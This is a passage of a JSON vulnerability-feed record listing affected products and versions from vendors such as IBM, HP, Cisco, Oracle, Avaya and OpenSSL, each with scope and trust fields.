"vendor": "ibm", "version": "8.7" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "flashcopy manager for oracle with sap environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.0" }, { "model": "db2 connect application server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "bbm on windows phone", "scope": "ne", "trust": 0.3, "vendor": "blackberry", "version": "2.0.0.25" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "flashcopy manager for oracle with sap environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.42" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "jre update30", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0.300" }, { "model": "java sdk 7r1 sr1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ctpview", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6.156" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.10" }, { "model": "link for mac os (build", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "1.0.16)" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.13" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.034" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.27" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.1" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.7" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.12" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere application server community edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.4" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jre update5", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "enterprise manager ops center", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "12.2" }, { "model": "pureapplication system", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.2" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "app for stream", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "rational sap connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.8" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.035" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1.6" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.1" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.1(5.106)" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "jdk update11", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.0" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "java sdk sr3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.42" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.3" }, { "model": "work space manager for bes10/bes12 23853 47", "scope": null, "trust": 0.3, "vendor": "blackberry", "version": null }, { "model": "java", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.480" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.026" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x638370" }, { "model": "netscaler application delivery controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1" }, { "model": "norman shark scada protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.2" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.2" }, { "model": "work space manager for bes10/bes12 25616 10", "scope": null, "trust": 0.3, "vendor": "blackberry", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "operations analytics predictive insights", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.4" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.33" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "network node manager i", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.20" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2.2" }, { "model": "workcentre spar", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "35500" }, { "model": "os image for aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.0" }, { "model": "application policy infrastructure controller 1.0", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.31" }, { "model": "tivoli monitoring fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.24" }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.18" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "aura conferencing sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365042550" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.9.1" }, { "model": "norman shark scada protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.3" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70007.4.0.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0-103" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12.201" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "java sdk sr1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.040" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.31" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "ace30 application control engine module 3.0 a5", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified computing system b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.96" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.012" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2.127" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.3" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.10" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.3" }, { "model": "db2 advanced workgroup server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "bbm meetings for android", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "0" }, { "model": "cms r17 r4", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "datapower gateway", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.9" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.065" }, { "model": "cognos insight standard edition fp if", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.214" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.9" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.11" }, { "model": "tivoli storage manager operations center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.200" }, { "model": "network node manager ispi for ip telephony", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.305" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.01" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.5" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3.0.10" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.5.03.00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.45" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.4" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1" }, { "model": "hunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.2" }, { "model": "database 12c release", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "112.12" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.2" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.037" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.01" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli storage manager client management services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "bbm meetings for ios", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.17" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "sametime community server limited use", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "platform cluster manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "jdk update22", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0.220" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.12" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571470" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24087370" }, { "model": "dataquant", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.31" }, { "model": "content collector for sap applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "db2 developer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "sterling connect:direct browser user interface", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.0.10" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.5" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "splunk", "scope": "ne", "trust": 0.3, "vendor": "splunk", "version": "6.0.8" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365041990" }, { "model": "flashcopy manager for oracle with sap environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.1.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.11" }, { "model": "network node manager ispi for net", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "flex system manager node types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87340" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.041" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "domino fix pack interim f", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.24" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.12" }, { "model": "secure work space for bes10/bes12", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "12.1.0.150359" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.015" }, { "model": "ddos secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "flashcopy manager for oracle", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "cms r17 r3", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0.180" }, { "model": "network node manager i", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "flashcopy manager for db2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.045" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.16" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.22" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "db2 enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "ringmaster appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "integrated management module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.47" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "domino interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.06" }, { "model": "websphere process server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.15" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.051" }, { "model": "java sdk sr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8" }, { "model": "clustered data ontap", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "websphere real time sr7 fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3.0.5" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "bbm meetings for windows", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "0" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.6" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.2" }, { "model": "bes", "scope": "ne", "trust": 0.3, "vendor": "blackberry", "version": "50" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0" }, { "model": "system m4 bd type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054660" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "jre update28", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4.19" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "iptv", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.11" }, { "model": "upward integration modules integrated installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "jdk update13", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "dataquant", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.1" }, { "model": "web security appliance 9.0.0 -fcs", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "work space manager for bes10/bes12 24998 176", "scope": null, "trust": 0.3, "vendor": "blackberry", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.6" }, { "model": "mint", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "bes12", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "12.1" }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "3" }, { "model": "sterling control center ifix04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.0.1" }, { "model": "flashcopy manager for oracle with sap environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.2" }, { "model": "link for windows", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "1.0.1.12" }, { "model": "jdk update4", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.024" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "jdk update23", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.045" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.03" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.5" }, { "model": "java sdk 7r1 sr3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571490" }, { "model": "domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.6" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jre 1.6.0 33", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura application server sip core pb3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.038" }, { "model": "db2 purescale feature", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": 